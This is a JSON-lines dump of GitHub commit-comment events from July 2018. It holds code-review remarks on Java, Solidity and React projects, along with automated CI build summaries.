{"id":"7950987114","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29673194,"position":13,"line":9,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"de20f7fd336b7e10cf3ad7361179f367cc905fc0","created_at":"2018-07-11T15:46:29Z","updated_at":"2018-07-11T15:46:29Z","author_association":"NONE","body":"В целом хорошо, но два момента требовали больше внимания. Постро на задание: ```MySystem.myOut.myPrintln(\"Hello World\")```\r\n\r\n1. ```myOut``` был написал в нотации camel, то есть со строчной буквы. Значит это не мог быть класс. В такой нотации пишут члены класса: поля и методы. В данном случае это должно было быть поле какого-то типа, у которого есть метод ```myPrintln()```, тоже, кстати, в нотации camel.\r\n2. В метод передаётся аргумент \"Hello World\", значит у метода должен присутствовать строковый параметр.\r\n\r\nМы с тобой пока ни поля классов, ни параметры методов не проходили, поэтому вполне можно допустить, что ты не знаешь, как это делать, но в ттаком случае от тебя я ожидал бы услышать вопросы, как это делается, или уточнения, правильно ли ты понимаешь, что делать нужно так-то и так-то. \r\n\r\nВ общем, старайся быть внимательным к таким вещам, не переиначивать задание, а пытаться понять, что нужно сделать и можешь ли ты это сделать сам, без дополнительных вопросов. Всегда лучше спросить."}},"created_at":"2018-07-11T15:46:29Z"}
{"id":"7950990862","type":"CommitCommentEvent","actor":{"login":"kponnima"},"repo":{"name":"kponnima/myapp-java-spring-crud"},"payload":{"comment":{"id":29673202,"position":null,"line":null,"path":null,"commit_id":"fca992fd01ee697b1f36eb0881493c771eab49f1","created_at":"2018-07-11T15:47:07Z","updated_at":"2018-07-11T15:47:07Z","author_association":"OWNER","body":"\r\ninitial commit"}},"created_at":"2018-07-11T15:47:07Z"}
{"id":"7950992525","type":"CommitCommentEvent","actor":{"login":"wouterlucas"},"repo":{"name":"WebPlatformForEmbedded/meta-wpe"},"payload":{"comment":{"id":29673204,"position":null,"line":null,"path":null,"commit_id":"2d1a731919e08f3de3f7193085631c3ffe53bed0","created_at":"2018-07-11T15:47:22Z","updated_at":"2018-07-11T15:47:22Z","author_association":"CONTRIBUTOR","body":"We’ve already moved this to another layer. \n\nEssentially we need to install a newer Gstreamer alongside an existing older Gstreamer. As they can’t upgrade (or well at least short term) and downgrading for us would most definitely break YT2018. \n\nSo we’re going to create another package that drops Gstreamer (the version we need) in another directory and preload it prior to WPE. \n\n> On Jul 11, 2018, at 8:43 AM, Khem Raj <notifications@github.com> wrote:\n> \n> why do we need this ? there is another layer for gst https://github.com/OSSystems/meta-gstreamer1.0\n> will that fit what you intend to do ? having same package split over many layers is just going to cause confusion.\n> \n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub, or mute the thread.\n"}},"created_at":"2018-07-11T15:47:22Z"}
{"id":"7950993491","type":"CommitCommentEvent","actor":{"login":"rjacobs914"},"repo":{"name":"uw-cmg/MAST-ML"},"payload":{"comment":{"id":29673207,"position":null,"line":null,"path":null,"commit_id":"8fc16d4f37bf8b05484addc4e395b8fb94aa8b82","created_at":"2018-07-11T15:47:33Z","updated_at":"2018-07-11T15:47:33Z","author_association":"CONTRIBUTOR","body":"There may be an issue with newest version of pymatgen changing some class names, which would lead to import and usage errors for Magpie feature generation. To be safe, can we have the dependency for pymatgen be\r\n\"pymatgen == 2017.9.23\"\r\n\r\nThat's the version I currently have installed and that feature generation worked ok"}},"created_at":"2018-07-11T15:47:33Z"}
{"id":"7950994720","type":"CommitCommentEvent","actor":{"login":"sindresorhus"},"repo":{"name":"sindresorhus/refined-github"},"payload":{"comment":{"id":29673209,"position":null,"line":null,"path":null,"commit_id":"74d7841c8f781b31843dfc8896a49855fbf8eb43","created_at":"2018-07-11T15:47:46Z","updated_at":"2018-07-11T15:47:46Z","author_association":"OWNER","body":"I don’t think this is an imorovent. Regex should be the last option. Here, it’s much simpler to just use `URL`. And the code is more readable too."}},"created_at":"2018-07-11T15:47:46Z"}
{"id":"7950995942","type":"CommitCommentEvent","actor":{"login":"CVignoli"},"repo":{"name":"CVignoli/MatrixTemplate"},"payload":{"comment":{"id":29673210,"position":null,"line":null,"path":null,"commit_id":"c705a4a1689f07f9907121467faf295b186eaa79","created_at":"2018-07-11T15:47:57Z","updated_at":"2018-07-11T15:47:57Z","author_association":"OWNER","body":"Mi ero scordato di caricarla"}},"created_at":"2018-07-11T15:47:57Z"}
{"id":"7950996536","type":"CommitCommentEvent","actor":{"login":"rjacobs914"},"repo":{"name":"uw-cmg/MAST-ML"},"payload":{"comment":{"id":29673211,"position":null,"line":null,"path":null,"commit_id":"8fc16d4f37bf8b05484addc4e395b8fb94aa8b82","created_at":"2018-07-11T15:48:03Z","updated_at":"2018-07-11T15:48:03Z","author_association":"CONTRIBUTOR","body":"Unless you changed those imports to be up to date"}},"created_at":"2018-07-11T15:48:03Z"}
{"id":"7950998949","type":"CommitCommentEvent","actor":{"login":"acrm"},"repo":{"name":"Rideress/JavaLearning"},"payload":{"comment":{"id":29673219,"position":5,"line":5,"path":"src/main/java/HelloWorld/HelloWorld.java","commit_id":"1073715da0eea7655970ffe2a23d17f4683695fa","created_at":"2018-07-11T15:48:26Z","updated_at":"2018-07-11T15:48:26Z","author_association":"NONE","body":"Вот тут ты заметил, что метод должен со строчной начинаться - хорошо!)"}},"created_at":"2018-07-11T15:48:26Z"}
{"id":"7950999368","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673220,"position":67,"line":53,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:48:30Z","updated_at":"2018-07-11T15:48:30Z","author_association":"NONE","body":"To keep `creationBlock` sounds like something a human is interested in. But when I look lower, I see that all the contract cares about is the deadline. The contract only cares about the deadline. So instead of keeping both the initial block and the duration, you would save a lot of gas by only keeping the deadline: `block.number + duration`."}},"created_at":"2018-07-11T15:48:30Z"}
{"id":"7951000223","type":"CommitCommentEvent","actor":{"login":"ermau"},"repo":{"name":"ermau/Tempest"},"payload":{"comment":{"id":29673222,"position":5,"line":55,"path":"Tempest/MessageResponseManager.cs","commit_id":"74f195c4c8f08f9161475d2ae5500ad04079acf1","created_at":"2018-07-11T15:48:39Z","updated_at":"2018-07-11T15:48:39Z","author_association":"OWNER","body":"It's a local timeout, you're not going to have timezone issues."}},"created_at":"2018-07-11T15:48:39Z"}
{"id":"7951003166","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673228,"position":91,"line":70,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:49:09Z","updated_at":"2018-07-11T15:49:09Z","author_association":"NONE","body":"You should always avoid doing unchecked subtractions. If you are not careful it will wrap around to huge numbers."}},"created_at":"2018-07-11T15:49:09Z"}
{"id":"7951008979","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673243,"position":56,"line":44,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:50:05Z","updated_at":"2018-07-11T15:50:05Z","author_association":"NONE","body":"How can you prevent the users from reusing the same puzzle original images?"}},"created_at":"2018-07-11T15:50:05Z"}
{"id":"7951014264","type":"CommitCommentEvent","actor":{"login":"18906441313"},"repo":{"name":"18906441313/token-profile"},"payload":{"comment":{"id":29673250,"position":1,"line":1,"path":"images/0xeeda4282c7011f5e3ccbade16f60ebd41ef957cc.png","commit_id":"58084d27688d2ca14f75fc75e8d92369e2542af1","created_at":"2018-07-11T15:50:56Z","updated_at":"2018-07-11T15:50:56Z","author_association":"OWNER","body":"![0xeeda4282c7011f5e3ccbade16f60ebd41ef957cc png](https://user-images.githubusercontent.com/40595178/42584199-39381856-8565-11e8-8426-48f389d0bd86.png)\r\n"}},"created_at":"2018-07-11T15:50:56Z"}
{"id":"7951016458","type":"CommitCommentEvent","actor":{"login":"hallyn"},"repo":{"name":"tych0/linux"},"payload":{"comment":{"id":29673257,"position":null,"line":null,"path":null,"commit_id":"0bca69cda70b465bcd51b796eff54c79f958733e","created_at":"2018-07-11T15:51:18Z","updated_at":"2018-07-11T15:51:18Z","author_association":"NONE","body":"Looks good to me!  Thanks."}},"created_at":"2018-07-11T15:51:18Z"}
{"id":"7951021728","type":"CommitCommentEvent","actor":{"login":"KwonGiho"},"repo":{"name":"Yoohyuna/exJoin_2"},"payload":{"comment":{"id":29673264,"position":4,"line":4,"path":"WebContent/members.js","commit_id":"61db78ddccab5c968f9375e17f54d523d41eaf1c","created_at":"2018-07-11T15:52:09Z","updated_at":"2018-07-11T15:52:09Z","author_association":"NONE","body":"```javascript\r\nwindow.onload=function() {\r\n...중략\r\n\r\n}\r\n이렇게 해볼래 ?\r\n```"}},"created_at":"2018-07-11T15:52:09Z"}
{"id":"7951024637","type":"CommitCommentEvent","actor":{"login":"kraj"},"repo":{"name":"WebPlatformForEmbedded/meta-wpe"},"payload":{"comment":{"id":29673269,"position":null,"line":null,"path":null,"commit_id":"2d1a731919e08f3de3f7193085631c3ffe53bed0","created_at":"2018-07-11T15:52:36Z","updated_at":"2018-07-11T15:52:36Z","author_association":"COLLABORATOR","body":"yikes !"}},"created_at":"2018-07-11T15:52:36Z"}
{"id":"7951027091","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673273,"position":8,"line":9,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:52:59Z","updated_at":"2018-07-11T15:52:59Z","author_association":"NONE","body":"Can you find a way to avoid keeping the `exchange` address on storage? Without reducing safety."}},"created_at":"2018-07-11T15:52:59Z"}
{"id":"7951027309","type":"CommitCommentEvent","actor":{"login":"vincentfretin"},"repo":{"name":"assembl/assembl"},"payload":{"comment":{"id":29673274,"position":null,"line":null,"path":null,"commit_id":"6c8266423a868e6104361c20b2fd935eebf97493","created_at":"2018-07-11T15:53:02Z","updated_at":"2018-07-11T15:53:02Z","author_association":"CONTRIBUTOR","body":"oh my... this is lots of removed code."}},"created_at":"2018-07-11T15:53:02Z"}
{"id":"7951028531","type":"CommitCommentEvent","actor":{"login":"payini"},"repo":{"name":"brave-intl/brave-node-notifier"},"payload":{"comment":{"id":29673277,"position":null,"line":null,"path":null,"commit_id":"3c619afaff4d99e7cbc049343a69ed02fb69147f","created_at":"2018-07-11T15:53:14Z","updated_at":"2018-07-11T15:53:14Z","author_association":"NONE","body":"That's great. You are welcome. Ready to keep helping as needed."}},"created_at":"2018-07-11T15:53:14Z"}
{"id":"7951028830","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/Nomenclature-api-module"},"payload":{"comment":{"id":29673278,"position":null,"line":null,"path":null,"commit_id":"1ad62531162aad39614e242c35380ddf99a3cfe7","created_at":"2018-07-11T15:53:17Z","updated_at":"2018-07-11T15:53:17Z","author_association":"MEMBER","body":"A ajouter dans l'update de GN du coup ?"}},"created_at":"2018-07-11T15:53:17Z"}
{"id":"7951029595","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673282,"position":100,"line":76,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:53:24Z","updated_at":"2018-07-11T15:53:24Z","author_association":"NONE","body":"Better emit before just in case the recipient emits too."}},"created_at":"2018-07-11T15:53:24Z"}
{"id":"7951031171","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673285,"position":110,"line":82,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:53:39Z","updated_at":"2018-07-11T15:53:39Z","author_association":"NONE","body":"Important state changes need events."}},"created_at":"2018-07-11T15:53:39Z"}
{"id":"7951032525","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673286,"position":108,"line":80,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:53:52Z","updated_at":"2018-07-11T15:53:52Z","author_association":"NONE","body":"`function pause()`?"}},"created_at":"2018-07-11T15:53:52Z"}
{"id":"7951034380","type":"CommitCommentEvent","actor":{"login":"ripplelabs-jenkins"},"repo":{"name":"scottschurr/rippled"},"payload":{"comment":{"id":29673290,"position":null,"line":null,"path":null,"commit_id":"56ecae3509f2a5f29bd03dee7c35cf245e60e67d","created_at":"2018-07-11T15:54:11Z","updated_at":"2018-07-11T15:54:11Z","author_association":"COLLABORATOR","body":"\n## Jenkins Build Summary\n\nBuilt from [this commit](https://github.com/scottschurr/rippled/commit/56ecae3509f2a5f29bd03dee7c35cf245e60e67d)\n\nBuilt at __20180711 - 15:54:11__\n\n### Test Results\n\nBuild Type | Log | Result | Status\n---------- | --- | ------ | ------\nmsvc.debug | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/msvc.debug.txt) | 1032 cases, 0 failed, t: 565s | PASS :white_check_mark: \ncoverage | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/coverage.txt) | 1035 cases, 0 failed, t: 691s | PASS :white_check_mark: \ndocs | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/docs.txt) | 1 cases, 0 failed, t: 2s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true, <br/>MANUAL_TESTS=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/gcc.release.unity_Dassert_true_MANUAL_TESTS_true.txt) | 1101 cases, 1 failed, t: 797s | FAIL :red_circle: \nclang.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/clang.debug.unity.txt) | 1035 cases, 0 failed, t: 252s | PASS :white_check_mark: \nrpm | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/rpm.txt) | 1034 cases, 0 failed, t: n/a | PASS :white_check_mark: \nclang.debug.unity, <br/>PARALLEL_TESTS=false | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/clang.debug.unity_PARALLEL_TESTS_false.txt) | 1035 cases, 0 failed, t: 497s | PASS :white_check_mark: \ngcc.debug.unity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/gcc.debug.unity.txt) | 1035 cases, 0 failed, t: 248s | PASS :white_check_mark: \nclang.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/clang.debug.nounity.txt) | 1033 cases, 0 failed, t: 680s | PASS :white_check_mark: \nmsvc.debug, <br/>PROJECT_NAME=rippled_classic | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/msvc.debug_PROJECT_NAME_rippled_classic.txt) | 1032 cases, 0 failed, t: 1238s | PASS :white_check_mark: \nclang.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/clang.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 338s | PASS :white_check_mark: \ngcc.debug.nounity | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/gcc.debug.nounity.txt) | 1033 cases, 0 failed, t: 623s | PASS :white_check_mark: \nmsvc.release | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/msvc.release.txt) | 1031 cases, 0 failed, t: 516s | PASS :white_check_mark: \ngcc.release.unity <br/>-Dassert=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/gcc.release.unity_Dassert_true.txt) | 1034 cases, 0 failed, t: 357s | PASS :white_check_mark: \ngcc.debug.unity <br/>-Dstatic=true | [logfile](http://ci.ops.ripple.com/job/scott-schurr-rippled/job/stobject-add/3//artifact/gcc.debug.unity_Dstatic_true.txt) | 1035 cases, 0 failed, t: 247s | PASS :white_check_mark: \n\n"}},"created_at":"2018-07-11T15:54:11Z"}
{"id":"7951034623","type":"CommitCommentEvent","actor":{"login":"otbu"},"repo":{"name":"CoolProp/CoolProp"},"payload":{"comment":{"id":29673291,"position":null,"line":null,"path":null,"commit_id":"0fdc8b2125bc011e99117b456eef672656be7ef9","created_at":"2018-07-11T15:54:13Z","updated_at":"2018-07-11T15:54:13Z","author_association":"NONE","body":"See #1697. Solved by updating the URL in .gitmodules (on master). "}},"created_at":"2018-07-11T15:54:13Z"}
{"id":"7951037540","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29673294,"position":null,"line":null,"path":null,"commit_id":"df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6","created_at":"2018-07-11T15:54:41Z","updated_at":"2018-07-11T15:54:41Z","author_association":"NONE","body":"179D_Reporting-v8.8.0 (Myoldmopar) - i386-Windows-7-VisualStudio-14: OK (2932 of 2932 tests passed, 11 test warnings)\n\nMessages:\n\n * 11 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-df9ddbf4d9859b7c4307cd4b02595a3c77d0f4a6-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-11T15:54:41Z"}
{"id":"7951040278","type":"CommitCommentEvent","actor":{"login":"camillemonchicourt"},"repo":{"name":"PnX-SI/Nomenclature-api-module"},"payload":{"comment":{"id":29673301,"position":null,"line":null,"path":null,"commit_id":"1ad62531162aad39614e242c35380ddf99a3cfe7","created_at":"2018-07-11T15:55:09Z","updated_at":"2018-07-11T15:55:09Z","author_association":"MEMBER","body":"En fait pour bien faire ca devrait etre dans un update du module Nomenclatures"}},"created_at":"2018-07-11T15:55:09Z"}
{"id":"7951045595","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673311,"position":117,"line":89,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:55:57Z","updated_at":"2018-07-11T15:55:57Z","author_association":"NONE","body":"You say you will use it but in `pay`, you use `keccak(` instead of `generatePuzzle`...\r\nYou should have a single source of truth. By telling the client to use this function and by having the pay function use another, although of course it is **now** the same, you make it possible for the developer to introduce a bug at a later date."}},"created_at":"2018-07-11T15:55:57Z"}
{"id":"7951048620","type":"CommitCommentEvent","actor":{"login":"e-shere"},"repo":{"name":"martynwinn/map-recognition"},"payload":{"comment":{"id":29673315,"position":null,"line":null,"path":null,"commit_id":"5730e1bdb71caa6f26a38cb55bd33b09bbf37881","created_at":"2018-07-11T15:56:27Z","updated_at":"2018-07-11T15:56:27Z","author_association":"COLLABORATOR","body":"outputs images into EM_slices_noisyedge, so if training on these the \"dirin\" in em_image_classify needs to be changed"}},"created_at":"2018-07-11T15:56:27Z"}
{"id":"7951049264","type":"CommitCommentEvent","actor":{"login":"ThisMushroom"},"repo":{"name":"MUnique/OpenMU"},"payload":{"comment":{"id":29673316,"position":null,"line":null,"path":null,"commit_id":"2e79aa24bed37035790a513bb795f4b588c8145b","created_at":"2018-07-11T15:56:34Z","updated_at":"2018-07-11T15:56:34Z","author_association":"NONE","body":"I guess it should be reverted. Learnable items like orbs and scrolls etc has no Durability so it would be always 0."}},"created_at":"2018-07-11T15:56:34Z"}
{"id":"7951052872","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"MNKCrypto/Remittance"},"payload":{"comment":{"id":29673320,"position":122,"line":94,"path":"contracts/Remittance.sol","commit_id":"83851eff021141ee64cc805769dd293aff11f161","created_at":"2018-07-11T15:57:11Z","updated_at":"2018-07-11T15:57:11Z","author_association":"NONE","body":"How can you mitigate the risk that the same passwords may be used on 2 different instances of Remittance contract?"}},"created_at":"2018-07-11T15:57:11Z"}
{"id":"7951058262","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/Glyssen"},"payload":{"comment":{"id":29673333,"position":null,"line":null,"path":null,"commit_id":"c58147e0cfd1a7887f56eed4ef61fe342e1280bb","created_at":"2018-07-11T15:58:04Z","updated_at":"2018-07-11T15:58:04Z","author_association":"NONE","body":"TeamCity Glyssen :: Glyssen pull requests - untagged [Build *.*.46.c58147e0cfd1a7887f56eed4ef61fe342e1280bb](http://build.palaso.org/viewLog.html?buildId=124605&buildTypeId=Glyssen_GlyssenPullRequestsUntagged) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:48"}},"created_at":"2018-07-11T15:58:04Z"}
{"id":"7951059441","type":"CommitCommentEvent","actor":{"login":"esokullu"},"repo":{"name":"phonetworks/graphjs"},"payload":{"comment":{"id":29673334,"position":null,"line":null,"path":null,"commit_id":"6e3e2d8c56058819000b7f513e392617e57ded18","created_at":"2018-07-11T15:58:16Z","updated_at":"2018-07-11T15:58:16Z","author_association":"CONTRIBUTOR","body":"Make sure this is our last batch commit. \r\n\r\nThanks,"}},"created_at":"2018-07-11T15:58:16Z"}
{"id":"7951062717","type":"CommitCommentEvent","actor":{"login":"WilliamHolmes"},"repo":{"name":"WilliamHolmes/watsonwork-xkcd-bot"},"payload":{"comment":{"id":29673346,"position":null,"line":null,"path":null,"commit_id":"39cd493b24e391db1cd977b9594c8150442d594e","created_at":"2018-07-11T15:58:49Z","updated_at":"2018-07-11T15:58:49Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.bluemix.net/devops/toolchains/4657741e-2f67-4a84-85fa-4b0c731e26d1?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\"): [Delivery Pipeline](https://console.bluemix.net/devops/pipelines/e457c094-74cf-4ee8-bf2e-53b78dadcc49?env_id=ibm%3Ayp%3Aeu-gb \"watsonwork-xkcd-bot\") deployed [watsonwork-xkcd-bot](https://github.com/WilliamHolmes/watsonwork-xkcd-bot/releases/tag/deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-155848 \"deploy-ibm-yp-eu-gb-holmesw-ie.ibm.com-dev-20180711-155848\") to [dev](https://console.bluemix.net/apps/0071371e-8c32-4628-9342-c288956009e4?env_id=ibm:yp:eu-gb \"ibm:yp:eu-gb:holmesw@ie.ibm.com:dev\"), including this commit"}},"created_at":"2018-07-11T15:58:49Z"}
{"id":"7951063621","type":"CommitCommentEvent","actor":{"login":"thopiekar"},"repo":{"name":"Ultimaker/Uranium"},"payload":{"comment":{"id":29673347,"position":11,"line":83,"path":"UM/Qt/Bindings/MainWindow.py","commit_id":"c20418405f6c10588b456e9b72e5e3999c7f7a35","created_at":"2018-07-11T15:58:58Z","updated_at":"2018-07-11T15:58:58Z","author_association":"CONTRIBUTOR","body":"Hmm, since it is going to be something that should work at the end, wouldn't you like to write your comment as it is a fact and get a rid of ~~might~~? :smile: "}},"created_at":"2018-07-11T15:58:58Z"}
{"id":"7951069777","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29673360,"position":null,"line":null,"path":null,"commit_id":"417a0bacb5889f80ef7a5e36df8d00d4298076fc","created_at":"2018-07-11T15:59:58Z","updated_at":"2018-07-11T15:59:58Z","author_association":"NONE","body":"issue_#6803 (mbadams5) - x86_64-MacOS-10.9-clang: Tests Failed (2094 of 2932 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nDataSetFixture Test Summary\n * Passed: 37\n * Failed: 2\n\nEnergyPlusFixture Test Summary\n * Passed: 448\n * Failed: 197\n\nInputProcessorFixture Test Summary\n * Passed: 40\n * Failed: 9\n\nintegration Test Summary\n * Passed: 4\n * Failed: 621\n\nSQLiteFixture Test Summary\n * Passed: 65\n * Failed: 3\n\nZoneUnitarySystemTest Test Summary\n * Passed: 3\n * Failed: 4\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-417a0bacb5889f80ef7a5e36df8d00d4298076fc-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-71.42%25-red.png)</a> \n"}},"created_at":"2018-07-11T15:59:58Z"}
{"id":"7951074957","type":"CommitCommentEvent","actor":{"login":"babydux"},"repo":{"name":"xd1936/inout2"},"payload":{"comment":{"id":29673374,"position":null,"line":null,"path":null,"commit_id":"f3230ad7e7e6cb4f28d514a7ef499bdd5f45674c","created_at":"2018-07-11T16:00:47Z","updated_at":"2018-07-11T16:00:47Z","author_association":"NONE","body":"I get an error (in red) when trying to run function include, Do I need to\ncreate a sheet or what filename do I need to add here? Still not sure how\nto view the dynamically created html page. Any help would be great,\n\nNo HTML file named undefined was found. (line 9, file \"Code\")\n\n\nErnest Duxbury - KM4HNH\nNational Weather Service\n5974 Commerce Blvd.\nMorristown, TN 37814\n423-586-4067\n\n\nOn Mon, Jul 9, 2018 at 2:24 PM, Leo <notifications@github.com> wrote:\n\n> @babydux <https://github.com/babydux> This code uses the Google Apps\n> Script Web App system\n> <https://developers.google.com/apps-script/guides/web> to dynamically\n> create the HTML page. Follow the instructions in the setup section of the\n> README <https://github.com/xd1936/inout2#setup> to get started.\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/xd1936/inout2/commit/f3230ad7e7e6cb4f28d514a7ef499bdd5f45674c#commitcomment-29645864>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/Am6K6LX25M9LU3zcvfmhndAJbJMyIWsbks5uE5_UgaJpZM4VBDBf>\n> .\n>\n"}},"created_at":"2018-07-11T16:00:47Z"}
{"id":"7951075230","type":"CommitCommentEvent","actor":{"login":"Ahmedfarghal"},"repo":{"name":"udacity/reactnd-contacts-complete"},"payload":{"comment":{"id":29673376,"position":null,"line":null,"path":null,"commit_id":"abd5fccf9a69546e75d9c178379d3ef92405719e","created_at":"2018-07-11T16:00:50Z","updated_at":"2018-07-11T16:00:50Z","author_association":"NONE","body":"> `import React, { Component } from 'react'\r\nimport PropTypes from 'prop-types'\r\nimport escapeRegExp from 'escape-string-regexp'\r\nimport sortBy from 'sort-by'\r\n\r\n\r\nclass ListContacts extends Component {\r\n    static propTypes = {\r\n      contacts: PropTypes.array.isRequired,\r\n      onDeleteContact: PropTypes.func.isRequired\r\n    }\r\n\r\n    state = {\r\n      query: ''\r\n    }\r\n\r\n  updateQuery = (query) => {\r\n    this.setState({ query: query.trim() })\r\n  }\r\n\r\n\r\nrender(){\r\n  let showingContacts\r\n    if(this.state.query){\r\n        const match = new RegExp(escapeRegExp(this.state.query),'i')\r\n        showingContacts = this.props.contacts.filter((contact)=> match.test(contact.name) )\r\n    } else {\r\n      showingContacts = this.props.contacts\r\n    }\r\n\r\n\r\n\r\n  return(\r\n        <div className='list-contacts'>\r\n        {JSON.stringify(this.state)}\r\n                <div className='list-contacts-top'>\r\n                    <input\r\n                      className='search-contacts'\r\n                      type='text'\r\n                      placeholder='Search contacts'\r\n                      value={this.state.query}\r\n                      onChange={(event) => this.updateQuery(event.target.value)} />\r\n                  </div>\r\n              <ol className = 'contact-list' >\r\n                  {showingContacts.contacts.map( (contacts) => (\r\n                      <li key = {contacts.id}className = 'contact-list-item' >\r\n                            <div className = 'contact-avatar'\r\n                                style = {\r\n                                    {\r\n                                  backgroundImage: `URL($(contact-avatarURL))`\r\n                                }}>\r\n                                <div className='contact-details'>\r\n                                    <p>{contacts.name}</p>\r\n                                    <p>{contacts.email}</p>\r\n                                    <p>{contacts.id}</p>\r\n                                    <button onClick={()=> this.props.onDeleteContact(contacts)} className='contact-remove'>\r\n                                      \r\n                                    </button>\r\n                                </div>\r\n                            </div>\r\n                      </li>\r\n                    )\r\n                  )}\r\n              </ol>\r\n        </div>\r\n  )\r\n}\r\n}\r\n\r\n\r\n\r\n\r\nexport default ListContacts`"}},"created_at":"2018-07-11T16:00:50Z"}
{"id":"7951075317","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"furqanbaqai/Remittance"},"payload":{"comment":{"id":29673377,"position":68,"line":42,"path":"contracts/Remittance.sol","commit_id":"f69b6002b1f9a8c0f24438f35653af1f070a0659","created_at":"2018-07-11T16:00:51Z","updated_at":"2018-07-11T16:00:51Z","author_association":"NONE","body":"You do know that transaction parameters are public, right? I can only look at them on Etherscan and already know them. There is no longer any challenge now."}},"created_at":"2018-07-11T16:00:51Z"}
